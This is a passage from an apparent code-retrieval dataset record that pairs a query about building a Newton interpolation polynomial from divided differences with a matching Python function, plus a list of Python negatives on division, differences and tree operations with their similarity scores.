\n dmKSdt,\n dsAMPAdt, \n dxNMDAdt, \n dsNMDAdt, \n dsGABAdt, \n dCadt,\n ]", "def ratio_calculator(numerator, denominator):\n ratios = []\n for i in numerator:\n for j in denominator:\n if i[0] == j[0] and j[1] != 0:\n ratios.append([i[0], round(float(i[1]) / j[1], 3)])\n break\n elif i[0] == j[0]:\n ratios.append([i[0], 0])\n return ratios", "def differences(input_list):\n output_list = []\n for x in range(1,len(input_list)):\n output_list.append(input_list[x]-input_list[x-1])\n return output_list", "def new_decomposition(self):\n from sage.combinat.binary_tree import BinaryTree\n t_low = self.lower_binary_tree().to_tilting()\n t_up = self.upper_binary_tree().to_tilting()\n common = [p for p in t_low if p in t_up]\n\n def extract_tree(x, y, tilt, common):\n \"\"\"\n Extract a tree with root at position xy (recursive).\n \"\"\"\n left_tree = None\n for k in range(y - 1, x, -1):\n if 
(x, k) in tilt:\n if (x, k) not in common:\n left_tree = extract_tree(x, k, tilt, common)\n break\n right_tree = None\n for k in range(x + 1, y):\n if (k, y) in tilt:\n if (k, y) not in common:\n right_tree = extract_tree(k, y, tilt, common)\n break\n return BinaryTree([left_tree, right_tree])\n\n TIP = self.parent()\n return [TIP.from_binary_trees(extract_tree(cx, cy, t_low, common),\n extract_tree(cx, cy, t_up, common))\n for cx, cy in common]", "def _items_divide(self, numerator_data, denominator_data):\n items = {}\n if numerator_data['items'] is None:\n items = None\n else:\n for n in numerator_data['items']:\n # TODO what should we do when a matching item isn't found?\n matching_d = next((item for item in denominator_data['items'] if\n item['group'] == n['group']),\n {'group': '_unknown', 'value': None})\n if matching_d['value'] is None or n['value'] is None:\n divided = None\n else:\n divided = n['value'] / matching_d['value']\n\n # item = dict({'group': n['group'],\n # 'value': divided})\n items[n['group']] = divided\n\n return {'items': items, 'grouping': numerator_data['grouping'],\n 'data_id': numerator_data['data_id']}", "def splitNodes(matching):\n outer = set(range(self.n))\n inner = set([])\n for (u, v) in matching:\n if u in outer:\n outer.remove(u)\n if v in outer:\n outer.remove(v)\n inner.add(u)\n inner.add(v)\n return list(inner), list(outer)", "def group_diff(options, db):\n nested_rvals = []\n for ip in options.gmp:\n nested_rvals.append(get_ip_parents(ip, db))\n # get just the list of groups, stripping out the networks.\n group1 = [x[0] for x in nested_rvals[0]]\n group2 = [x[0] for x in nested_rvals[1]]\n common = sorted(list(set(group1) & set(group2)))\n diff1 = sorted(list(set(group1) - set(group2)))\n diff2 = sorted(list(set(group2) - set(group1)))\n return common, diff1, diff2", "def get_ratios(L1, L2):\r\n ratios = []\r\n for index in range(len(L1)):\r\n try:\r\n ratios.append(L1[index]/float(L2[index]))\r\n except ZeroDivisionError:\r\n ratios.append(float('NaN')) #NaN = not a number\r\n except:\r\n raise ValueError('get_ratios called with bad arg')\r\n return ratios", "def diff_eq(self,x,t,par):\n \n # setting the functions\n s = x[0]\n i = x[1]\n r = x[2]\n d = x[3]\n \n # mathematical equations\n DiffS = -par[1]*(s/10**par[4])*(i**par[0])\n DiffI = (par[1]*(s/10**par[4]) - par[2] - par[3])*(i**par[0])\n DiffR = par[2]*(i**par[0])\n DiffD = par[3]*(i**par[0])\n \n return [DiffS,DiffI,DiffR,DiffD]", "def sub_division(width: float, minimum_division: float, stretch_factor: float) -> list:\n\n sum_x = 0\n next_ = minimum_division\n new_grid = []\n max_dx = 20/100\n x = width/2\n\n while sum_x < x:\n remaining = x - sum_x\n\n if next_ > max_dx:\n n = np.ceil(remaining/max_dx)\n\n if n == 0:\n new_grid.append(remaining)\n\n next_ = remaining/n\n\n for _ in range(0, int(n)):\n new_grid.append(next_)\n sum_x += next_\n\n remaining = x - sum_x\n\n if next_ < remaining:\n new_grid.append(next_)\n sum_x += next_\n else:\n remaining += new_grid[-1]\n new_grid[-1] = remaining/2\n new_grid.append(remaining/2)\n sum_x = x\n\n next_ = next_ * stretch_factor\n\n x1 = new_grid[::-1]\n x2 = new_grid+x1\n\n return x2", "def convert_elemwise_div(node, **kwargs):\n return create_basic_op_node('Div', node, kwargs)", "def multi_dec(f):\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n args = args[0] if len(args) == 1 and isinstance(args[0], (list, tuple)) else args\n for arg in args:\n if isinstance(arg, Node) and arg.parent.name is 'root':\n arg.parent.remove_child(arg)\n 
arg.update_child_calls()\n return f(*args, **kwargs)\n return wrapper", "def _floatdiff(x, y):\n rankx = _rank(x)\n ranky = _rank(y)\n return _diff(rankx, ranky)", "def test_dividing(self):\n divider = Divider()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n if j != 0:\n self.assertEqual(i/j, divider.calc(j, i))", "def split_validation_data(*data, divmod=0.5):\n n = round((len(data[0]) - 1) * divmod)\n return [(d[n:], d[:n]) for d in data]", "def eval_numerical_gradient_blobs(f, inputs, output, h=1e-5):\n numeric_diffs = []\n for input_blob in inputs:\n diff = np.zeros_like(input_blob.diffs)\n it = np.nditer(input_blob.vals, flags=['multi_index'],\n op_flags=['readwrite'])\n while not it.finished:\n idx = it.multi_index\n orig = input_blob.vals[idx]\n\n input_blob.vals[idx] = orig + h\n f(*(inputs + (output,)))\n pos = np.copy(output.vals)\n input_blob.vals[idx] = orig - h\n f(*(inputs + (output,)))\n neg = np.copy(output.vals)\n input_blob.vals[idx] = orig\n\n diff[idx] = np.sum((pos - neg) * output.diffs) / (2.0 * h)\n\n it.iternext()\n numeric_diffs.append(diff)\n return numeric_diffs", "def _get_nums_from_fractions(self, nums):\n\t\tnums_fraction = []\n\n\t\tfor num in nums:\n\t\t\tif re.search(\"\\d*\\(\\d+/\\d+\\)\\d*\", num):\n\t\t\t\tnums_fraction.append(num)\n\t\tnums_fraction = sorted(nums_fraction, key=lambda x: len(x), reverse=True)\n\n\t\tfloat_nums = []\n\t\tfor num in nums:\n\t\t\tif ',' in num:\n\t\t\t\t# [TODO] It can be points with comma like (0, 1)...\n\t\t\t\tnew_num = []\n\t\t\t\tfor c in num:\n\t\t\t\t\tif c == ',':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tnew_num.append(c)\n\t\t\t\tnum = ''.join(new_num)\n\t\t\t\tfloat_num = num\n\t\t\telse:\n\t\t\t\tfloat_num = num\n\n\t\t\ttry:\n\t\t\t\tfloat_nums.append(str(float(eval(float_num))))\n\t\t\texcept:\n\t\t\t\tif float_num.startswith('0'):\n\t\t\t\t\twhile float_num.startswith('0'):\n\t\t\t\t\t\tfloat_num = float_num[1:]\n\t\t\t\t\tfloat_nums.append(str(float(eval(float_num))))\n\n\t\tfloat_nums_fraction = []\n\t\tfor num in nums_fraction:\n\t\t\tif ',' in num:\n\t\t\t\tnew_num = []\n\t\t\t\tfor c in num:\n\t\t\t\t\tif c == ',':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tnew_num.append(c)\n\t\t\t\tnum = ''.join(new_num)\n\t\t\t\tfloat_nums_fraction.append(str(float(eval(num))))\n\t\t\telse:\n\t\t\t\tfloat_nums_fraction.append(str(float(eval(num))))\n\n\t\treturn float_nums, float_nums_fraction", "def decompose_paths(self):\n if self.child_nodes == {}:\n return []\n\n import numpy as np\n\n def decompose_paths_rec(node_inner, path):\n \"\"\"\n This function does the recursive create_path of the decomposition\n :param node_inner:\n :param path:\n \"\"\"\n if node_inner.is_leaf():\n path = np.append(path, str(node_inner.value))\n return path[None]\n else:\n paths = np.array([])\n for edge_name in node_inner.child_nodes:\n new_path = np.append(path, str(edge_name))\n paths = np.append(paths, decompose_paths_rec(node_inner.child_nodes[edge_name], new_path))\n return paths\n\n decomposition = decompose_paths_rec(self, np.array([]))\n return decomposition.reshape((decomposition.shape[0]/(self.d+1), self.d+1))", "def compute_relations(nodes: List[Node]) -> None:\n # Calculate parents\n for node in nodes:\n node.parents = []\n for node in nodes:\n for child in node.children():\n child.parents.append(node)\n\n def compute_dominators(\n entry: Node,\n parents: Callable[[Node], List[Node]],\n dominators: Callable[[Node], Set[Node]],\n immediately_dominates: Callable[[Node], List[Node]],\n set_immediate_dominator: Callable[[Node, 
Optional[Node]], None],\n ) -> None:\n # See https://en.wikipedia.org/wiki/Dominator_(graph_theory)#Algorithms\n # Note: if `n` is unreachable from `entry`, then *every* node will\n # vacuously belong to `n`'s dominator set.\n for n in nodes:\n dominators(n).clear()\n if n == entry:\n dominators(n).add(n)\n else:\n dominators(n).update(nodes)\n\n changes = True\n while changes:\n changes = False\n for node in nodes:\n if node == entry:\n continue\n nset = dominators(node)\n for parent in parents(node):\n nset = nset.intersection(dominators(parent))\n nset.add(node)\n if len(nset) < len(dominators(node)):\n assert nset.issubset(dominators(node))\n dominators(node).intersection_update(nset)\n changes = True\n\n # Compute immediate dominator, and the inverse relation\n for node in nodes:\n immediately_dominates(node).clear()\n for node in nodes:\n doms = dominators(node).difference({node})\n # If `node == entry` or the flow graph is not reducible, `doms` may be empty.\n # TODO: Infinite loops could be made reducible by introducing\n # branches like `if (false) { return; }` without breaking semantics\n if doms:\n # There should be a unique max `len(dominators(d))` if the flowgraph\n # is reducible. Fall back to largest index for irreducible graphs.\n imdom = max(doms, key=lambda d: (len(dominators(d)), d.block.index))\n immediately_dominates(imdom).append(node)\n set_immediate_dominator(node, imdom)\n else:\n set_immediate_dominator(node, None)\n for node in nodes:\n immediately_dominates(node).sort(key=lambda x: x.block.index)\n\n def _set_immediate_dominator(node: Node, imdom: Optional[Node]) -> None:\n node.immediate_dominator = imdom\n\n def _set_immediate_postdominator(node: Node, impdom: Optional[Node]) -> None:\n node.immediate_postdominator = impdom\n\n entry = nodes[0]\n terminal = nodes[-1]\n assert isinstance(terminal, TerminalNode)\n\n # Compute dominators & immediate dominators\n compute_dominators(\n entry=entry,\n parents=lambda n: n.parents,\n dominators=lambda n: n.dominators,\n immediately_dominates=lambda n: n.immediately_dominates,\n set_immediate_dominator=_set_immediate_dominator,\n )\n\n # Compute postdominators & immediate postdominators\n # This uses the same algorithm as above, but with edges reversed\n compute_dominators(\n entry=terminal,\n parents=lambda n: n.children(),\n dominators=lambda n: n.postdominators,\n immediately_dominates=lambda n: n.immediately_postdominates,\n set_immediate_dominator=_set_immediate_postdominator,\n )\n\n # Iterate over all edges n -> c and check for backedges, which define natural loops\n for node in nodes:\n for child in node.children():\n if child not in node.dominators:\n continue\n # Found a backedge node -> child where child dominates node; child is the \"head\" of the loop\n if child.loop is None:\n child.loop = NaturalLoop(child)\n child.loop.nodes |= {child, node}\n child.loop.backedges.add(node)\n for parent in nodes:\n if reachable_without(parent, node, child):\n child.loop.nodes.add(parent)", "def compare_trees(first_soup: HTMLStrip, second_soup: HTMLStrip) -> float:\n first_tree = Tree.from_soup_object(first_soup.file_name, first_soup.original_soup)\n second_tree = Tree.from_soup_object(second_soup.file_name, second_soup.original_soup)\n\n common_paths_size: int = first_tree.num_of_common_paths(second_tree)\n target_size: int = second_tree.total_num_of_paths()\n similarity = float(common_paths_size)*100/target_size\n print(f'{similarity:.2f}')\n return similarity", "def _group_nodes(cls, nodes, node_info_holder):\n 
group_nodes = [[]]\n kb_nodes = []\n for n in nodes:\n matched_scope = []\n if n.name in node_info_holder.nodes_keep:\n kb_nodes.append(n)\n continue\n for scope in node_info_holder.scopes:\n if scope in n.name and n.name[n.name.find(scope) + len(scope)] == \"/\":\n matched_scope.append(scope)\n if len(matched_scope) > 1:\n raise ValueError(\n \"More than one scope {} contained in node name {}.\".format(\n str(matched_scope), n.name))\n if matched_scope:\n curr_scope = matched_scope[0]\n if group_nodes[-1]:\n group_nodes.append(curr_scope)\n group_nodes.append([])\n node_info_holder.nodes[curr_scope].append(n)\n else:\n group_nodes[-1].append(n)\n return group_nodes, kb_nodes", "def arithmeticDivision2(numbers,str_result,target):\n success = False\n str_temp=\"\"\n for x in numbers:\n if x%target==0:\n target2=x//target\n numbers.remove(x)\n numbers,str_temp,success=arithmeticBasic(numbers,str_temp,target2)\n if success:\n str_result+=str(x)+'/('+str_temp+')'\n numbers.clear()\n numbers.append(target)\n break\n else:\n numbers.insert(0,x)\n return numbers,str_result,success", "def find_step(tree: Tree, template: Tree) -> list:\n if template == \"@\":\n if type(tree) == str:\n return [tree]\n return tree.leaves()\n\n if template == '*':\n return []\n\n if type(template) != str and template.label() == '*':\n res_star = []\n for temp_node in template:\n res_star.extend(find_star_step(tree, temp_node))\n return res_star\n\n if type(tree) == str or type(template) == str:\n if tree == template:\n return []\n return []\n\n if tree.label() != template.label():\n return []\n else:\n\n res = []\n for t_node in template:\n for node in get_node_by_label(tree, t_node):\n res.extend(find_step(node, t_node))\n return res", "def testListDivide():\n listDivide([1, 2, 3, 4, 5])\n listDivide([2, 4, 6, 8, 10])\n listDivide([30, 54, 63, 98, 100], divide=10)\n listDivide([])\n listDivide([1, 2, 3, 4, 5], 1)", "def diff(*args):\n return reduce(lambda x, y: x - y, args)", "def diff(self, da, axis):\n\n def interp_function(data_left, data_right, shift):\n # linear, centered interpolation\n # TODO: generalize to higher order interpolation\n return shift*(data_right - data_left)\n return self._neighbor_binary_func(da, axis, interp_function)", "def test_scalar_division(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n\n a2 = a1 / 2\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 0.5, -1, 1.5, -2))", "def get_resulting_diffs():\n diff_dirpath = application.join_abs_path(\n EMPTY_TEST_DIR, application.OUTPUT_DIR_NAME)\n diffleft_filename = application.join_abs_path(\n diff_dirpath, application.OUTPUT_DIFF_LEFT_FILENAME)\n diffright_filename = application.join_abs_path(\n diff_dirpath, application.OUTPUT_DIFF_RIGHT_FILENAME)\n\n diff_left = read_gzip_file_lines_into_set(diffleft_filename)\n diff_right = read_gzip_file_lines_into_set(diffright_filename)\n\n return diff_left, diff_right", "def _divide(triangle, points):\n a, b, c = triangle\n\n # Insert points midway along each side of the triangle.\n # Form 3 new triangles.\n new_vertices = [\n _midpoint(points[a], points[b]),\n _midpoint(points[b], points[c]),\n _midpoint(points[c], points[a]),\n ]\n\n new_vertices_indices = [\n len(points),\n len(points) + 1,\n len(points) + 2,\n ]\n\n new_triangles = [\n (a, new_vertices_indices[0], new_vertices_indices[2]),\n (b, new_vertices_indices[1], new_vertices_indices[0]),\n (c, new_vertices_indices[2], new_vertices_indices[1]),\n ]\n\n return new_vertices, new_triangles", "def 
testListDivide():\n #a\n numbers = [1,2,3,4,5]\n expected = 2\n \n try:\n assert listDivide(numbers) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\")\n \n \n #b\n numbers = [2,4,6,8,10]\n expected = 5\n \n try:\n assert listDivide(numbers) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\") \n \n #c\n numbers = [30, 54, 63, 98, 100]\n divide = 10\n expected = 2\n \n try:\n assert listDivide(numbers, divide) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\") \n \n #d\n numbers = []\n expected = 0\n \n try:\n assert listDivide(numbers) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\") \n \n #e\n numbers = [1, 2, 3, 4, 5]\n divide = 1\n expected = 5\n \n try:\n assert listDivide(numbers, divide) == expected\n except AssertionError:\n raise ListDivideException(\"Test Failed\")", "def compute_tree_changes(dmt_new, dmt_old, directory_path=''):\n updated, new, deleted = set(), set(), set()\n # Base cases:\n # Both files or empty directories\n if (not dmt_new.children) and (not dmt_old.children):\n return updated, new, deleted\n # New directory\n elif not dmt_old.children:\n mutual_filesystem_items = set()\n new_filesystem_items = set(dmt_new.children.keys())\n deleted_filesystem_items = set()\n elif not dmt_new.children:\n mutual_filesystem_items = set()\n new_filesystem_items = set()\n deleted_filesystem_items = set(dmt_old.children.keys())\n else:\n mutual_filesystem_items = set(dmt_new.children.keys()).intersection(set(dmt_old.children.keys()))\n new_filesystem_items = set(dmt_new.children.keys()).difference(set(dmt_old.children.keys()))\n deleted_filesystem_items = set(dmt_old.children.keys()).difference(set(dmt_new.children.keys()))\n \n \n # Compile the set of updated files and directories, as well as any other changes within subdirectories.\n for filesystem_item in mutual_filesystem_items:\n # Always check subdirectories for e.g file renamings.\n if filesystem_item[-1] == '/':\n subdir_name = filesystem_item\n subdir_path = directory_path + subdir_name\n subdir_updated, subdir_new, subdir_deleted = \\\n compute_tree_changes(dmt_new.children[subdir_name], dmt_old.children[subdir_name], subdir_path)\n \n # Mark the subdirectory if necessary.\n if (dmt_old.children[subdir_name].dmt_hash != dmt_new.children[subdir_name].dmt_hash) or \\\n subdir_updated or subdir_new or subdir_deleted:\n updated.add(subdir_path)\n \n # Incorporate differences from within.\n updated.update(subdir_updated)\n new.update(subdir_new)\n deleted.update(subdir_deleted)\n \n # File with differing hash values.\n elif dmt_old.children[filesystem_item].dmt_hash != dmt_new.children[filesystem_item].dmt_hash:\n filename = filesystem_item\n file_path = directory_path + filename\n updated.add(file_path)\n \n # Compile the set of newly created files.\n for filesystem_item in new_filesystem_items:\n item_path = directory_path + filesystem_item\n new.add(item_path)\n new.update(get_all_paths(dmt_new.children[filesystem_item], item_path))\n \n # Compile the set of deleted files.\n for filesystem_item in deleted_filesystem_items:\n item_path = directory_path + filesystem_item\n deleted.add(item_path)\n deleted.update(get_all_paths(dmt_old.children[filesystem_item], item_path))\n \n return updated, new, deleted", "def diff_eq(self,x,t,par):\n # setting the functions\n s,i,r,d = x\n a,b,r,d,logS0 = par\n\n S0 = 10**logS0\n \n # mathematical equations\n DiffS = - par[1]*(s/S0)*(i**a)\n DiffI = 
par[1]*(s/S0)*(i**a) -(r+d)*i\n DiffR = r*i\n DiffD = d*i\n \n return [DiffS,DiffI,DiffR,DiffD]", "def get_energy_of_split(self, elem_l, elem_r):\n\n # logging.debug(f\"computing energy of split: {ch_l, ch_r}\")\n\n # elem_l = self.clusters[ch_l]\n # elem_r = self.clusters[ch_r]\n\n # To follow the convention on Ginkgo, to get the correct result, we set t==0 if we have a leaf, i.e. t<t_cut\n l_node_invM = 0\n r_node_invM =0\n l_node_invM = self.momentum[elem_l][0] ** 2 - np.linalg.norm(self.momentum[elem_l][1::]) ** 2\n r_node_invM = self.momentum[elem_r][0] ** 2 - np.linalg.norm(self.momentum[elem_r][1::]) ** 2\n\n logging.debug(f\" t_l ={l_node_invM}\")\n logging.debug(f\" t_R ={r_node_invM}\")\n\n logging.debug(f\" p_l ={self.momentum[elem_l]}\")\n logging.debug(f\" p_r ={self.momentum[elem_r]}\")\n\n split_llh = likelihood.split_logLH_with_stop_nonstop_prob(self.momentum[elem_l],\n self.momentum[elem_r],\n self.min_invM,\n self.Lambda)\n\n\n # logging.debug(f\"split_llh = {split_llh}\")\n\n # llh = split_llh + a_node.map_tree_energy + b_node.map_tree_energy\n logging.debug(f\"split likelihood ={split_llh}\")\n\n return split_llh", "def testListDivide():\n assert listDivide([1,2,3,4,5]) == 2\n assert listDivide([2,4,6,8,10]) == 5\n assert listDivide([30, 54, 63,98, 100], divide = 10) == 2\n assert listDivide([]) == 0\n assert listDivide([1,2,3,4,5], 1) == 5", "def div(a, x):\n return [a[i]/x for i in range(2)]", "def _divide_pred(pred):\n if type(pred) == list:\n fake = []\n real = []\n for p in pred:\n fake.append([tensor[:tensor.size(0) // 2] for tensor in p])\n real.append([tensor[tensor.size(0) // 2:] for tensor in p])\n else:\n fake = pred[:pred.size(0) // 2]\n real = pred[pred.size(0) // 2:]\n\n return fake, real", "def diff_eq(self,x,t,par):\n # setting the functions\n s,i,r,d = x\n b,r,d,logS0 = par\n\n S0 = 10**logS0\n \n # mathematical equations\n DiffS = 0\n DiffI = par[1]*(s/S0)*i\n DiffR = r*i\n DiffD = d*i\n \n return [DiffS,DiffI,DiffR,DiffD]", "def diffs(self):\n return np.array([self.diff(i) for i in self.idx])", "def compute_relative_changes(a_list):\n result = []\n\n for i in range(1,len(a_list)):\n rel = (a_list[i] - a_list[i-1])/a_list[i-1]\n result.append(rel)\n\n return result", "def step(nodes, outputs, edges):\n flowed = []\n for node_name in nodes.copy():\n if node_name in flowed:\n continue\n if len(nodes[node_name]) == 2:\n if node_name in flowed:\n continue\n node = [int(value) for value in nodes[node_name]]\n low_value, high_value = min(node), max(node)\n low_flow, high_flow = edges[node_name] \n low_dictionary, low_node_name = low_flow\n high_dictionary, high_node_name = high_flow\n low_node = low_dictionary.get(low_node_name, tuple())\n high_node = high_dictionary.get(high_node_name, tuple())\n low_dictionary[low_node_name] = low_node + (str(low_value),)\n high_dictionary[high_node_name] = high_node + (str(high_value),)\n nodes[node_name] = tuple()\n if low_dictionary is nodes:\n flowed.append(low_node_name)\n if high_dictionary is nodes:\n flowed.append(high_node_name)\n return nodes, outputs, edges", "def node_diff(self):\n if self.input1 is None or self.input2 is None:\n raise Exception(\"Missing input: please run the populate() method first\")\n if self.node_dict1 is None or self.node_dict2 is None:\n self.make_node_dict()\n # Initialize dictonaries to keep track of the nodes in respnse 1 and response 2\n g1={}\n g2={}\n # Set to keep track of the union of all curie ids\n curie_set = set()\n for curie in self.node_dict1.keys():\n g1[curie] = {}\n # 
intersection is only in the g1 dictionary\n g1[curie]['intersection'] = set()\n # node section keeps track of node ids associated with each node i.e. \"n0\"\n g1[curie]['node'] = set()\n curie_set.add(curie)\n for curie in self.node_dict2.keys():\n g2[curie] = {}\n # node section keeps track of node ids associated with each node i.e. \"n0\"\n g2[curie]['node'] = set()\n curie_set.add(curie)\n node_names1 = []\n node_names2 = []\n\n # extract all node ids (i.e. \"n0\",\"n1\",ect...)\n if len(self.input1['question_graph']['nodes'])>0:\n if 'id' in self.input1['question_graph']['nodes'][0]:\n node_names1 = [x['id'] for x in self.input1['question_graph']['nodes']]\n elif 'node_id' in self.input1['question_graph']['nodes'][0]:\n node_names1 = [x['node_id'] for x in self.input1['question_graph']['nodes']]\n if len(self.input2['question_graph']['nodes'])>0:\n if 'id' in self.input2['question_graph']['nodes'][0]:\n node_names2 = [x['id'] for x in self.input2['question_graph']['nodes']]\n elif 'node_id' in self.input2['question_graph']['nodes'][0]:\n node_names2 = [x['node_id'] for x in self.input2['question_graph']['nodes']]\n \n # initialize the result dictonary\n diff_dict = {}\n diff_dict[\"-1|-1\"] = {'intersection':[],'g1-g2':[],'g2-g1':[]}\n # initialize node id tuple keys\n for id1 in node_names1:\n for id2 in node_names2:\n diff_dict[id1+\"|\"+id2] = {'intersection':[],'g1-g2':[],'g2-g1':[]}\n # iterate through answers\n for answer1 in self.input1['answers']:\n for answer2 in self.input2['answers']:\n for id1 in answer1['node_bindings'].keys():\n # This is to handle cases where answer node id has a list or a string\n if isinstance(answer1['node_bindings'][id1], str):\n bindings1 = [answer1['node_bindings'][id1]]\n elif isinstance(answer1['node_bindings'][id1], list):\n bindings1 = answer1['node_bindings'][id1]\n for curie1 in bindings1:\n # store node id\n g1[curie1]['node'].add(id1)\n for id2 in answer2['node_bindings'].keys():\n # This is to handle cases where answer node id has a list or a string\n if isinstance(answer2['node_bindings'][id2], str):\n bindings2 = [answer2['node_bindings'][id2]]\n elif isinstance(answer2['node_bindings'][id2], list):\n bindings2 = answer2['node_bindings'][id2]\n for curie2 in bindings2:\n # store node id\n g2[curie2]['node'].add(id2)\n if curie1 == curie2:\n # stor intersection tuple\n g1[curie1]['intersection'].add(id1+\"|\"+id2)\n # iterate through all curies\n for curie in curie_set:\n # check if curie is from answer 1\n if curie in g1.keys():\n # check if in intersection\n if len(g1[curie]['intersection'])>0:\n diff_dict[\"-1|-1\"]['intersection'] += [self.node_dict1[curie]]\n for id1 in node_names1:\n for id2 in node_names2:\n node_tuple = id1+\"|\"+id2\n if id1 in g1[curie]['node'] and id2 in g2[curie]['node']:\n diff_dict[node_tuple]['intersection'] += [self.node_dict1[curie]]\n elif id1 in g1[curie]['node']:\n diff_dict[node_tuple]['g1-g2'] += [self.node_dict1[curie]]\n elif id2 in g2[curie]['node']:\n diff_dict[node_tuple]['g2-g1'] += [self.node_dict1[curie]]\n # If not in intersection store in g1-g2\n else:\n diff_dict[\"-1|-1\"]['g1-g2'] += [self.node_dict1[curie]]\n for id1 in g1[curie]['node']:\n # iterate through all answer 2 ids\n for id2 in node_names2:\n diff_dict[id1+\"|\"+id2]['g1-g2'] += [self.node_dict1[curie]]\n # if not in g1 but in g2 then in g2-g1\n elif curie in g2.keys():\n diff_dict[\"-1|-1\"]['g2-g1'] += [self.node_dict2[curie]]\n for id2 in g2[curie]['node']:\n # iterate through all answer 1 ids\n for id1 in node_names1:\n 
diff_dict[id1+\"|\"+id2]['g2-g1'] += [self.node_dict2[curie]]\n return diff_dict", "def _findTangentSplitAuto(self, angles):\n # get angles from points\n splits = []\n\n # get average variables\n minAngle = min(angles) or 0.00001\n maxAngle = max(angles)\n average = (minAngle + maxAngle) * 0.5\n mean = sum(angles) / len(angles) * 0.5\n\n # get value at which to split\n threshold = (math.log(average) - math.log(mean)) / (math.log(maxAngle) - math.log(minAngle)) * average\n\n # if curve is relatively smooth don't split\n if mean * 10 > average:\n return []\n\n # split based on angles\n for i, angle in enumerate(angles):\n if angle > threshold:\n splits.append(i + 1)\n\n return splits", "def deltaCalc(self, expected):\n \n n = len(self.structure)\n self.delta = [None] * n\n self.delta[n - 1] = []\n \n for i in xrange(len(expected)):\n curr = self.a[n - 1][i]\n self.delta[n - 1].append(self.derivativeFunc(curr) * (expected[i] - curr))\n self.delta[n - 1] = np.array(self.delta[n - 1])\n \n # From n - 1 to 1 layer \n for i in xrange(n - 1, 0, -1):\n currDelta = self.delta[i]\n if i != (n - 1):\n currDelta = currDelta[0][:-1]\n \n self.delta[i - 1] = np.array(np.dot(currDelta, self.theta[i]))\n self.delta[i - 1][0] *= self.a[i - 1]\n \n return", "def subtree_distances(self, root):\r\n\r\n nodes = root.get_terminals()\r\n nodes.reverse()\r\n node_pairs = itertools.ifilter(\r\n lambda (a1, a2): a1.name < a2.name,\r\n itertools.product(nodes, nodes))\r\n\r\n distances = [self._node_distance(pair[0], pair[1])\r\n for pair in node_pairs]\r\n\r\n return distances" ]
[ "0.7081299", "0.526944", "0.52446645", "0.5239564", "0.523342", "0.51974493", "0.51963425", "0.5140926", "0.50798607", "0.5076724", "0.50607145", "0.5054353", "0.5047319", "0.49978474", "0.49799216", "0.49528977", "0.49478018", "0.49372533", "0.49131808", "0.490018", "0.48992065", "0.4881139", "0.483447", "0.48213744", "0.48211652", "0.48179495", "0.4774421", "0.4773157", "0.47703457", "0.47701833", "0.47622505", "0.4756548", "0.47551778", "0.47547767", "0.4747443", "0.4740483", "0.47289827", "0.47096822", "0.47052774", "0.47030467", "0.4702251", "0.47013265", "0.46887287", "0.4685533", "0.46786118", "0.46610072", "0.46476656", "0.4639737", "0.4637906", "0.4625062", "0.46239173", "0.4619137", "0.4612453", "0.46091428", "0.4601979", "0.4597569", "0.459671", "0.45939854", "0.45768806", "0.4569076", "0.45597997", "0.4558658", "0.45555708", "0.45529705", "0.4551819", "0.4549997", "0.4547624", "0.45384267", "0.45300558", "0.4526362", "0.45232844", "0.4520279", "0.45197383", "0.45188397", "0.45123148", "0.45092767", "0.4509249", "0.45070252", "0.45035177", "0.45033658", "0.44852942", "0.4481704", "0.44811776", "0.44747904", "0.44728574", "0.44725865", "0.44647738", "0.44606042", "0.44577897", "0.4456576", "0.44557968", "0.4454424", "0.4448886", "0.4448548", "0.44468504", "0.44465604", "0.44409955", "0.44394305", "0.44353747", "0.4431598" ]
0.77134573
0
Creates a polynomial from a given list of divided differences. The polynomial string is built according to the equation provided in the project docs.
import sympy as sy  # assumed import: `sy` is only ever used as sy.simplify() below


def calculate_newton_interpolation(divided_differences):
    polynomial = []

    # Build the Newton form term by term:
    # f[x0] + f[x0,x1]*(x-x0) + f[x0,x1,x2]*(x-x0)*(x-x1) + ...
    for i, divided_differences_row in enumerate(divided_differences):
        polynomial_part = '({0})'.format(divided_differences_row[0].divided_difference)

        for j in range(0, i):
            # The interpolation nodes x_j are read from the first row of the table.
            polynomial_part += '*(x-{0})'.format(divided_differences[0][j].x)

        polynomial_part += '+'
        polynomial.append(polynomial_part)

    # Concatenate the terms and drop the trailing '+'.
    polynomial_str = ''.join(polynomial)[:-1]
    print('Calculated polynomial: {0}'.format(polynomial_str))

    # Heuristic simplification of calculated polynomial
    simplified_polynomial = sy.simplify(polynomial_str)
    print("Simplified polynomial: {0}".format(simplified_polynomial))

    return simplified_polynomial
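A minimal usage sketch for the function above, assuming a table layout in which row 0 holds the original interpolation nodes (the only row whose `.x` values the function reads) and each deeper row holds the next-order differences. `Node` is a hypothetical stand-in for the `DividedDifferenceNode` objects seen in the neighboring snippets; it exposes only the two attributes the function touches:

class Node:
    # Hypothetical stand-in for DividedDifferenceNode: only the two
    # attributes read by calculate_newton_interpolation() are provided.
    def __init__(self, x, divided_difference):
        self.x = x
        self.divided_difference = divided_difference


# Divided-difference table for f(x) = x**2 on the nodes 1, 2, 3.
# Row 0: f[x_i] = 1, 4, 9; row 1: f[x_i, x_{i+1}] = 3, 5; row 2: f[x_0, x_1, x_2] = 1.
table = [
    [Node(1, 1), Node(2, 4), Node(3, 9)],
    [Node(2, 3), Node(3, 5)],   # .x values in rows > 0 are never read
    [Node(3, 1)],
]

# Builds "(1)+(3)*(x-1)+(1)*(x-1)*(x-2)" and simplifies it back to x**2.
# Assumes calculate_newton_interpolation() above (and its sympy import) is in scope.
result = calculate_newton_interpolation(table)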
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
